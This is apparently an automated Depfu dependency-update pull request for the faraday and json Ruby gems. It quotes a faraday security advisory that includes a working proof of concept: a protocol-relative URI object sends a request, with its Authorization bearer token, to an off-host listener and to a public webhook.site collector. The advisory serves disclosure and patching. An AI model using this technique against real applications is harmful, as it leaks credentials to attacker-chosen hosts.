🚨 [security] Update faraday 2.14.1 → 2.14.2 (patch)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

↗️ faraday (indirect, 2.14.1 → 2.14.2) · Repo · Changelog

Security Advisories 🚨

🚨 Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2: protocol-relative URI objects still bypass host scoping

Summary

Faraday::Connection#build_exclusive_url still allows protocol-relative host override when the request target is provided as a URI object instead of a String. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and can redirect a request built from a fixed-base Faraday::Connection to an attacker-controlled host while preserving connection-scoped headers such as Authorization.

Affected Component

• Repository File(s)/Endpoint(s):
  • lib/faraday/connection.rb
  • lib/faraday/request.rb
  • spec/faraday/connection_spec.rb
  • spec/faraday/request_spec.rb
• Function(s):
  • Faraday::Connection#build_exclusive_url
  • Faraday::Connection#run_request
  • Faraday::Request#url
  • Faraday::Request#to_env
• Version(s) Tested:
  • Faraday 2.14.1
  • repository HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca

Attacker Profile

• Who: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection
• Access Required: Ability to supply data that the application converts to URI.parse(...) and passes to conn.get(...), [conn.post](http://conn.post/)(...), or req.url(...)
• Capability: Control over a protocol-relative URI such as URI("//evil.example/pwn")

Steps to Reproduce

1. Use the current repository checkout and load Faraday from lib/.
2. Build a fixed-base connection and provide a protocol-relative URI object to req.url.
3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host.
4. Observe that the connection-scoped Authorization header remains attached to the off-host request.

Verification Evidence

• Environment: macOS, Ruby from local environment, Faraday 2.14.1, faraday-net_http, local WEBrick listener on 127.0.0.1:4567, HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca
• Commands executed:

$ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start'
$ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body'

• PoC code (inline):

require "faraday"
require "faraday/net_http"
conn = Faraday.new(url: "http://trusted.example/base", headers: {

"Authorization" => "Bearer secret-token"

}) { |f| f.adapter :net_http }
target = ["//127.0.0.1:4567", "/pwn"].join

resp = conn.get(URI(target))
puts resp.status

puts resp.body

• Exit code: 0
• stdout (relevant excerpt):

200
host=127.0.0.1
auth=Bearer secret-token
path=/pwn

• stderr (relevant excerpt):

N/A

• Artifacts: none

Additional External Confirmation

The issue was also independently reproduced against a public HTTP collector on Faraday 2.14.1 using the default net_http adapter:

require "faraday"
require "faraday/net_http"
conn = Faraday.new(

url: "http://trusted.example/base",

headers: { "Authorization" => "Bearer secret-token" }

) { |f| f.adapter :net_http }
target = ["//webhook.site", "/<collector-id>"].join

resp = conn.get(URI(target))

resp.status

# => 200

resp.url.host

# => "webhook.site"

This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage.

Supporting Materials

• Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2
• Existing CVE for the original string-based issue: CVE-2026-25765
• Existing regression tests for the string-only fix:
  • spec/faraday/connection_spec.rb:314-345
• Existing test proving supported URI request input:
  • spec/faraday/request_spec.rb:26-31

Impact

The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the
connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

Release Notes

2.14.2

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add Ruby 4 to CI by @larouxn in #1659
• Modernize RuboCop configuration and fix offenses by @larouxn in #1660
• Lint: Style/OneClassPerFile by @olleolleolle in #1668
• fix(docs): fix incorrect link label by @JohnnyKei in #1667
• chore: Upgrade package.json packages using audit fix by @olleolleolle in #1669

New Contributors

• @larouxn made their first contribution in #1659
• @JohnnyKei made their first contribution in #1667

Full Changelog: v2.14.1...v2.14.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 8 commits:

• Update version.rb
• Merge commit from fork
• Upgrade package.json packages using audit fix (#1669)
• Create SECURITY.md
• fix(docs): fix incorrect link label in request-options and remove dead link in url-encoding (#1667)
• Lint: Style/OneClassPerFile (#1668)
• Modernize RuboCop configuration and fix offenses (#1660)
• Add Ruby 4 to CI (#1659)

↗️ json (indirect, 2.19.1 → 2.19.5) · Repo · Changelog

Security Advisories 🚨

🚨 Ruby JSON has a format string injection vulnerability

Impact

A format string injection vulnerability than that lead to denial of service attacks or information disclosure, when the allow_duplicate_key: false parsing option is used to parse user supplied documents.

This option isn't the default, if you didn't opt-in to use it, you are not impacted.

Patches

Patched in 2.19.2.

Workarounds

The issue can be avoided by not using the allow_duplicate_key: false parsing option.

Release Notes

2.19.5

What's Changed

• Cap the parser to emit a maximum of 5 deprecation warnings per document. Emitting more is not helpful.

Full Changelog: v2.19.4...v2.19.5

2.19.4

What's Changed

• Fix parsing of out of range floats (very large exponents that lead to either 0.0 or Inf).

Full Changelog: v2.19.2...v2.19.4

2.19.3

• Fix handling of unescaped control characters preceeded by a backslash.

Full Changelog: v2.19.2...v2.19.3

2.19.2

What's Changed

• Fix a format string injection vulnerability in JSON.parse(doc, allow_duplicate_key: false). CVE-2026-33210

Full Changelog: v2.19.1...v2.19.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 34 commits:

• Release 2.19.5
• Avoid spamming too many deprecations while parsing
• Test TruffleRuby release in CI for improved stability
• Force ensure_valid_encoding to be inlined.
• Use RB_ENC_CODERANGE to first check the cached coderange before calling rb_enc_str_coderange if the coderange is unknown.
• Fix typo in changelog
• Release 2.19.4
• Fix references to NAN and INFINITY in documentation comments
• Reduce warnings
• Fix parsing of *negative* out of bound floats.
• Fix handling out of of range exponent in numbers
• Fix json generation for symbols on TruffleRuby
• Keep Integer#to_json optimized and adapt the test
• Avoid extra String#+@ calls, interpolated strings are already mutable
• Avoid method redefinition warnings in test_broken_bignum
• test_broken_bignum: avoid fork and subprocess for robustness
• Generate non-frozen strings on TruffleRuby for consistency
• Remove some dead scripts and configs
• Remove outdated README-json-jruby.md
• Release 2.19.3
• Fix handling of unescaped control characters preceeded by a backslash
• parser.c: handle eagerly freed rstack in rvalue_stack_mark
• Use embeddable types
• Run CI against ruby-head-debug
• Revert use of RUBY_TYPED_EMBEDDABLE
• Fix Ruby 4.1.0dev compatibility
• Use embeddable types
• Reduce an unnecessary intermediate string
• Remove unreachable code
• Add security backports in the changelog
• Release 2.19.2
• Fix a format string injection vulnerability
• Merge pull request #953 from ruby/dependabot/github_actions/actions/create-github-app-token-3
• Bump actions/create-github-app-token from 2 to 3

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)

[depfu]

Closed in favor of #197.